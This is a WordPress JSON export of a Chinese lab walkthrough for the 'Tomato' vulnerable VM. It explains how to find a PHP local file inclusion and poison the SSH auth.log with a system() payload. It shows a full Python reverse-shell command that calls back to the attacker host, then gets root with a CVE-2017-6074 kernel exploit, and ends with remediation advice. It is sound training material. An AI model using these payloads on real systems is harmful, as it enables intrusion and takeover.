{"id":125,"date":"2022-04-01T13:38:21","date_gmt":"2022-04-01T05:38:21","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=125"},"modified":"2022-04-07T11:48:39","modified_gmt":"2022-04-07T03:48:39","slug":"tomato-%e9%9d%b6%e6%9c%ba%ef%bc%88%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e%ef%bc%89","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=125","title":{"rendered":"Tomato-\u9776\u673a\uff08\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff09"},"content":{"rendered":"<h2>\u4fe1\u606f\u6536\u96c6<\/h2>\n<h3>\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u786e\u5b9a\u9776\u573aip<\/h3>\n<pre><code class=\"language-shell\">arp-scan -l\n\u6216\nnmap -sP 192.168.226.0\/24<\/code><\/pre>\n<p>注：<code>-sP<\/code> 是旧参数名，新版 nmap 中等价于 <code>-sn<\/code>（只做主机发现，不扫端口）；arp-scan 需要 root 权限，且只对同一二层网段有效。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225511800.png\" alt=\"image-20220331225511800\" \/><\/p>\n<h3>\u626b\u63cf\u76ee\u6807\u4e3b\u673a\u5f00\u653e\u7684\u7aef\u53e3<\/h3>\n<pre><code class=\"language-shell\">nmap -sS -sV -p- -v 192.168.226.128<\/code><\/pre>\n<p>注意地址：后文中靶机一直是 192.168.226.133，而 192.168.226.128 是攻击机（反弹 shell 的回连地址），这条命令扫的应当是 192.168.226.133，疑为笔误。<code>-sS<\/code>（SYN 扫描）需要 root 权限，<code>-p-<\/code> 全端口扫描较慢；后文 SSH 使用的 2211 端口应当能在这一步的结果中看到。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225436113-16487384951241.png\" alt=\"image-20220331225436113\" \/><\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8bbf\u95eeweb\u670d\u52a1<\/h3>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225636145.png\" alt=\"image-20220331225636145\" \/><\/p>\n<p>\u672a\u66fe\u53d1\u73b0\u6709\u7528\u4fe1\u606f<\/p>\n<h3>\u7f51\u7ad9\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">dirb http:\/\/192.168.226.133\n\u6216\npython3 dirsearch.py -u 192.168.226.133 -e*<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401111819590.png\" alt=\"image-20220401111819590\" \/><\/p>\n<p>\u7b2c\u4e8c\u79cd\u65b9\u5f0f\u672a\u80fd\u63a2\u6d4b\u51fa\u6709\u6548\u76ee\u5f55<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401111726322.png\" alt=\"image-20220401111726322\" 
\/><\/p>\n<p>访问antibot_image发现服务器开启了目录浏览（directory listing，会直接列出目录下的所有文件；注意这和路径穿越意义上的“目录遍历”不是一回事）<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112106863.png\" alt=\"image-20220401112106863\" \/><\/p>\n<p>\u53d1\u73b0info.php\u662fphpinfo\u7684\u754c\u9762<\/p>\n<p>phpinfo 页面本身就是信息泄露：从中可以确认 PHP 版本、<code>disable_functions<\/code>、<code>open_basedir<\/code>、<code>allow_url_include<\/code> 等配置，这些直接决定后面的文件包含能否读到日志、能否调用 <code>system()<\/code>，建议先记下来。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112140567.png\" alt=\"image-20220401112140567\" \/><br \/>\n<img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112200083.png\" alt=\"image-20220401112200083\" \/><\/p>\n<p>\u67e5\u770b\u9875\u9762\u6e90\u4ee3\u7801\u53d1\u73b0\u4e00\u4e32\u6587\u4ef6\u5305\u542b\u7684\u4ee3\u7801<\/p>\n<p><code>image<\/code> 参数的值被直接用作被包含文件的路径，也就是本地文件包含（LFI）。关键在于这里是 include 而不是单纯读文件：被包含文件中的 PHP 代码会被执行，这正是后面日志投毒能拿到 shell 的前提。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112259828.png\" alt=\"image-20220401112259828\" \/><\/p>\n<pre><code>http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/etc\/passwd<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112504260.png\" alt=\"image-20220401112504260\" \/><\/p>\n<p>\u53ef\u4ee5\u8bfb\u53d6\u51fapasswd\u6587\u4ef6\u7684\u5185\u5bb9<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\u88ab\u6c61\u67d3\u7684SSH\u65e5\u5fd7\u6765getshell<\/p>\n<pre><code class=\"language-shell\">ssh &#039;&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;&#039;@192.168.226.133 -p2211<\/code><\/pre>\n<p>注意引号：上面的写法里单引号是嵌套的，shell 实际传给 ssh 的“用户名”是 <code>&lt;?php system($_GET[cmd]); ?&gt;<\/code>（cmd 没有引号）。PHP 7 下 <code>cmd<\/code> 会被当作未定义常量退化成字符串并报警告，仍能执行；PHP 8 起未定义常量直接抛出 Error，载荷失效。更稳妥的写法是外层用双引号并转义 <code>$<\/code>：<\/p>\n<pre><code class=\"language-shell\">ssh &quot;&lt;?php system(\\$_GET[&#039;cmd&#039;]); ?&gt;&quot;@192.168.226.133 -p2211<\/code><\/pre>\n<p>另外，整个日志文件是被 include 的，一旦写入了语法有误的载荷，以后每次包含 auth.log 都会解析失败，这个入口就废了，所以载荷要一次写对。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401113105319.png\" alt=\"image-20220401113105319\" \/><\/p>\n<p>\u8fd9\u6837<code>&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;<\/code>\u8be5\u7528\u6237\u5c31\u4f1a\u88ab\u8bb0\u5f55\u5230ssh\u7684\u65e5\u5fd7\u4e2d\u53bb（登录失败即可，目的只是让 sshd 把这个“用户名”原样写进日志；<code>-p2211<\/code> 是靶机 SSH 的端口）<\/p>\n<p>ssh\u65e5\u5fd7\u5728<code>\/var\/log\/auth.log<\/code>\u4e2d（这是 Debian\/Ubuntu 系的默认路径，RHEL\/CentOS 系在 <code>\/var\/log\/secure<\/code>）。这一步成立的前提是 web 进程（通常是 www-data）对该日志有读权限：默认 auth.log 是 root:adm 0640，www-data 读不到；此靶机能读出来说明权限被放宽了，真实环境里这一点要先验证。<\/p>\n<p>\u5f00\u542fnc\u76d1\u542c（在攻击机 192.168.226.128 上执行）<\/p>\n<pre><code class=\"language-shell\">nc -lvnp 3388<\/code><\/pre>\n<p>\u67e5\u770b\u76ee\u6807\u4e3b\u673a\u6709\u6ca1\u6709\u5b89\u88c5python<\/p>\n<pre><code>view-source:http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/var\/log\/auth.log&amp;cmd=whereis python<\/code><\/pre>\n<p><code>view-source:<\/code> 前缀只是让浏览器显示原始文本而不渲染；auth.log 的其余内容也会一并输出，命令结果要在其中查找。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401125910910.png\" alt=\"image-20220401125910910\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u76ee\u6807\u9776\u673a\u5b89\u88c5\u4e86python3\uff0c\u90a3\u5c31\u53ef\u4ee5\u5229\u7528python\u8fdb\u884c\u53cd\u5f39\u4e86<\/p>\n<pre><code>view-source:http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/var\/log\/auth.log&amp;cmd=python3 -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.226.128&quot;,3388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);&#039;<\/code><\/pre>\n<p>载荷里的空格、引号、分号等在浏览器地址栏里会被自动编码，但若改用 curl 等工具发送，需要自行做 URL 编码（如 %20、%27）。回连地址 192.168.226.128:3388 就是上面攻击机上 nc 监听的地址和端口。<\/p>\n<p>\u6210\u529f\u53cd\u5f39shell<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401130102991.png\" alt=\"image-20220401130102991\" \/><\/p>\n<h2>\u6743\u9650\u63d0\u5347<\/h2>\n<p>\u67e5\u770b\u64cd\u4f5c\u7cfb\u7edf\u5185\u6838（<code>uname -a<\/code>；后面选用的 exp 目录是 kernel-4.4.0-21-generic，必须与这里看到的内核版本严格对应）<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401130403061.png\" alt=\"image-20220401130403061\" \/><\/p>\n<p>\u5efa\u7acb\u53ef\u4ea4\u4e92\u5f0fshell<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133007522.png\" alt=\"image-20220401133007522\" \/><\/p>\n<p>\u5728\u7f51\u4e0a\u67e5\u770b\u5bf9\u5e94\u7684exp<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/kkamagui\/linux-kernel-exploits.git<\/code><\/pre>\n<p>\u4e0b\u8f7d\u653b\u51fb\u4ee3\u7801\uff0c\u8fdb\u5165<code>linux-kernel-exploits\/kernel-4.4.0-21-generic\/CVE-2017-6074<\/code>\u76ee\u5f55\uff0c\u8fd0\u884c<code>compile.sh<\/code>\u6587\u4ef6<\/p>\n<p>注意：CVE-2017-6074 是 DCCP 模块的 double-free 内核漏洞，利用过程涉及内核内存破坏，失败时可能让靶机直接 panic 或卡死。靶场里无所谓，但真实渗透中应先排查 <code>sudo -l<\/code>、SUID 文件、计划任务等更稳妥的提权途径，内核 exp 只在确认内核版本完全匹配、且客户接受风险后再用。另外 exp 是在攻击机上编译后再传到靶机的，要留意两边 glibc 版本是否兼容，必要时加 <code>-static<\/code> 静态编译。<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132504088.png\" alt=\"image-20220401132504088\" \/><\/p>\n<p>\u67e5\u770b\u751f\u6210\u7684exp<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132551891.png\" alt=\"image-20220401132551891\" \/><\/p>\n<p>\u4f7f\u7528python\u5f00\u542f\u4e00\u4e2a\u4e34\u65f6http\u670d\u52a1\u5668（一般是在攻击机 exp 所在目录执行 <code>python3 -m http.server<\/code>）<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132645112.png\" alt=\"image-20220401132645112\" \/><\/p>\n<p>\u9776\u673a\u5207\u6362\u5230tmp\u76ee\u5f55\u4e0b\uff0c\u4e0b\u8f7dexp\uff0c\u5e76\u7ed9\u4e88\u6267\u884c\u7684\u6743\u9650（若 \/tmp 挂载了 noexec，可改用 \/dev\/shm）<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133431132.png\" alt=\"image-20220401133431132\" \/><\/p>\n<p>\u8fd0\u884c\u6587\u4ef6\uff0c\u63d0\u5347\u6743\u9650<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133550158.png\" alt=\"image-20220401133550158\" \/><\/p>\n<p>\u6210\u529f\u62ff\u5230root\u6743\u9650<\/p>\n<h2>修复建议<\/h2>\n<p>对 <code>image<\/code> 参数做白名单校验（只允许固定目录下的固定文件名），不要把用户输入直接交给 include；删除线上环境的 phpinfo 页面；关闭 Web 服务器的目录浏览；保持 <code>\/var\/log\/auth.log<\/code> 等日志仅 root\/adm 可读；及时更新内核（CVE-2017-6074 已有补丁）。<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4fe1\u606f\u6536\u96c6 \u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u786e\u5b9a\u9776\u573aip arp-scan -l \u6216 nmap -sP 192.168.226.0\/24 \u626b\u63cf\u76ee\u6807\u4e3b\u673a\u5f00 
&#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-125","post","type-post","status-publish","format-standard","hentry","category-9"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=125"}],"version-history":[{"count":4,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions"}],"predecessor-version":[{"id":203,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions\/203"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=125"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}